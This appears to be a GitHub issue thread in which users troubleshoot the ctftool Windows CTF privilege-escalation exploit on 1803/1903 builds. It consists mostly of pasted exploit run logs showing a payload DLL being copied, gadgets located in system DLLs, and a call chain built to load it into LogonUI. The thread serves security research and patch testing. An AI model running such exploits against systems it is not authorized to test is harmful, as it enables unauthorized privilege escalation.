Open J1nchur1k1 opened 5 years ago
Same here, i tried at my company test computers, 1903 and 1803 without August patch and cmd did not spawned.. 🤔 i'm wondering whats the issue
Can you try the scripts\ctf-consent-system.ctf
script instead?
Sure taviso, will give you output about the same.
I have tested with it.... it spawned me a cmd, but as soon as I did whoami, it gave me same user, rather that NT-authority.
ctf> script scripts\ctf-consent-system.ctf Attempting to copy exploit payload... C:payload64.dll 1 File(s) copied
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! !!! YOU DONT NEED TO KNOW ANY PASSWORD, JUST WAIT! !!! !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
PromptOnSecureDesktop is 0 Closing existing ALPC Port Handle 00000234... The ctf server port is located at \BaseNamedObjects\msctf.serverDefault1 Connected to CTF server@\BaseNamedObjects\msctf.serverDefault1, Handle 000002D4 Waiting for the consent dialog to join the session...
all is going well, just the cmd is not getting spawned on the locked screen.
Below are the artifacts for the same
ctf> script scripts\ctf-logonui-system.ctf Attempting to copy exploit payload... C:payload64.dll 1 File(s) copied
The screen will lock to trigger the login screen in 5 seconds... Closing existing ALPC Port Handle 0000023C... The ctf server port is located at \BaseNamedObjects\msctf.serverWinlogon1 Connected to CTF server@\BaseNamedObjects\msctf.serverWinlogon1, Handle 0000023C Client 0, Tid 5792 (Flags 0000, Hwnd 000016A0, Pid 3032, ctftool.exe) Client 1, Tid 9196 (Flags 0x1000000c, Hwnd 000023EC, Pid 3044, LogonUI.exe) Found new client LogonUI.exe, DefaultThread now 9196 ReleaseId is 1803 Guessed msvcrt => C:\WINDOWS\system32\msvcrt.DLL Found Gadget 48895C... in module msvcrt at offset 0x30c20 C:\WINDOWS\system32\msvcrt.DLL->.text->VirtualAddress is 0x001000 C:\WINDOWS\system32\msvcrt.DLL->.text->PointerToRawData is 0x000400 C:\WINDOWS\system32\kernel32.DLL->.data->VirtualAddress is 0x0a8000 Command succeeded, stub created Dumping Marshal Parameter 3 (Base 01429368, Type 0x106, Size 0x18, Offset 0x40) 000000: 4d e7 c6 71 28 0f d8 11 a8 2a 00 06 5b 84 43 5c M..q(....*..[.C\ 000010: 01 00 00 00 43 c4 1f 00 ....C... Marshalled Value 3, COM {71C6E74D-0F28-11D8-A82A-00065B84435C}, ID 1, Timestamp 0x1fc443 0x7ffdf3270000 0x7ffdf3a30000 0x7ffdf38b0000 Guessed msctf => C:\WINDOWS\system32\msctf.DLL Found Gadget 488b41... in module msctf at offset 0xc3550 C:\WINDOWS\system32\msctf.DLL->.text->VirtualAddress is 0x001000 C:\WINDOWS\system32\msctf.DLL->.text->PointerToRawData is 0x000400 0x7ffdf3a30000 Guessed kernel32 => C:\WINDOWS\system32\kernel32.DLL C:\WINDOWS\system32\kernel32.DLL is a 64bit module. kernel32!LoadLibraryA@0x180000000+0x1e090 The CFG call chain is built, writing in parameters... Writing in the payload path "C:\WINDOWS\TEMP\EXPLOIT.DLL"... 0x7ffdf33d0000 Guessed combase => C:\WINDOWS\system32\combase.DLL Found Gadget 488b49... in module combase at offset 0x1d9270 C:\WINDOWS\system32\combase.DLL->.text->VirtualAddress is 0x001000 C:\WINDOWS\system32\combase.DLL->.text->PointerToRawData is 0x000400 Payload created and call chain ready, get ready...
Exploit complete.